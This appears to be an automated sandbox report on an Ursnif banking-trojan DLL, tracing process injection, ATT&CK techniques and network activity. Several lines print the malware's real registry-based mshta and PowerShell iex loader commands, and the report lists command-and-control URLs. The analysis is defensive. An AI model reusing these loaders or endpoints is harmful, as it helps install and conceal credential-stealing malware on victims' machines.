            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3352
            Source: C:\Windows\System32\control.exe | Thread register set: target process: 3352
            Source: C:\Windows\System32\control.exe | Thread register set: target process: 3352
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
            Source: C:\Windows\explorer.exe | Thread created: unknown EIP: 8DCB1580
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP"
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000002F.00000000.471103608.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.479070191.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.518388066.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 0000002F.00000000.479497547.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000002F.00000000.472743615.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.480257089.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473153549.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.473755452.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000002F.00000000.492712624.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496673793.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C15F8B cpuid 1_2_01C15F8B
            Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046CDB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_046CDB44
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C130FD GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_01C130FD
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C13807 GetVersion,GetLastError, 1_2_01C13807
            Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C15F8B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_01C15F8B

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            MITRE ATT&CK Matrix (a number before a technique name is the report's count badge for that technique; empty cells have no entry):

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            1 Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact
            Default Accounts | 3 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 DLL Side-Loading | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 1 File Deletion | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | 813 Process Injection | 1 Masquerading | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Valid Accounts | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 813 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Regsvr32 | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
            Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Rundll32 | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 560270 | Sample: 61f113091fd0c.dll | Startdate: 26/01/2022 | Architecture: WINDOWS | Score: 100

            Start [2]
              Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Yara detected Ursnif; Machine Learning detection for sample; 6 other signatures
              Started: loaddll32.exe [9]; mshta.exe [12]; mshta.exe [14]; 2 other processes [16]

            loaddll32.exe [9]
              Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 3 other signatures
              Started: regsvr32.exe [18]; control.exe [22]; cmd.exe [24]; rundll32.exe [26]

            mshta.exe [12]
              Started: powershell.exe [28]

            mshta.exe [14]
              Started: powershell.exe [30]

            2 other processes [16]
              Started: powershell.exe [32]; powershell.exe [34]

            regsvr32.exe [18]
              DNS/IP: 192.168.2.1 unknown unknown
              Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 2 other signatures
              Started: control.exe [36]

            control.exe [22]
              Signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Maps a DLL or memory area into another process

            cmd.exe [24]
              Started: rundll32.exe [39]

            rundll32.exe [26]
              Signatures: System process connects to network (likely due to code injection or exploit)
              Started: control.exe [42]

            powershell.exe [28]
              Signatures: Creates a thread in another existing process (thread injection)
              Started: 3 other processes [49]

            powershell.exe [30]
              Started: csc.exe [44]; 2 other processes [51]

            powershell.exe [32]
              Started: csc.exe [47]; 2 other processes [53]

            powershell.exe [34]
              Started: 3 other processes [55]

            control.exe [36]
              Signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
              Injected: explorer.exe [57]

            rundll32.exe [39]
              DNS/IP: 194.76.226.200, 49752, 49753, 49754 SERVINGADE Germany
              Signatures: Writes registry values via WMI
              Started: control.exe [60]

            control.exe [42]
              Started: rundll32.exe [62]

            csc.exe [44]
              Dropped: C:\Users\user\AppData\Local\...\sjfy431f.dll, PE32
              Started: cvtres.exe [64]

            csc.exe [47]
              Dropped: C:\Users\user\AppData\Local\...\oyq1c2cj.dll, PE32
              Started: cvtres.exe [66]

            3 other processes [49]
              Dropped: C:\Users\user\AppData\Local\...\ugg3o5nf.dll, PE32; C:\Users\user\AppData\Local\...\pqvogmwc.dll, PE32
              Started: 2 other processes [74]

            2 other processes [51]
              Dropped: C:\Users\user\AppData\Local\...\0hsihch1.dll, PE32
              Started: cvtres.exe [68]

            2 other processes [53]
              Dropped: C:\Users\user\AppData\Local\...\oeprcmty.dll, PE32
              Started: cvtres.exe [70]

            3 other processes [55]
              Dropped: C:\Users\user\AppData\Local\...\tpt0a0ul.dll, PE32; C:\Users\user\AppData\Local\...\pwlcj2cu.dll, PE32
              Started: cvtres.exe [72]

            explorer.exe [57] (injected)
              Signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Disables SPDY (HTTP compression, likely to perform web injects); Creates a thread in another existing process (thread injection)

            control.exe [60]
              Started: rundll32.exe [76]

Source | Detection | Scanner | Label
61f113091fd0c.dll | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
4.2.rundll32.exe.3290000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
5.2.rundll32.exe.1050000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
1.2.loaddll32.exe.1c10000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
3.2.regsvr32.exe.31f0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
No Antivirus matches
Source | Detection | Scanner | Label
http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk | 0% | Avira URL Cloud | safe
http://curlmyip.net | 0% | Avira URL Cloud | safe
http://194.76.226.200/ | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd | 0% | Avira URL Cloud | safe
http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: | 0% | Avira URL Cloud | safe
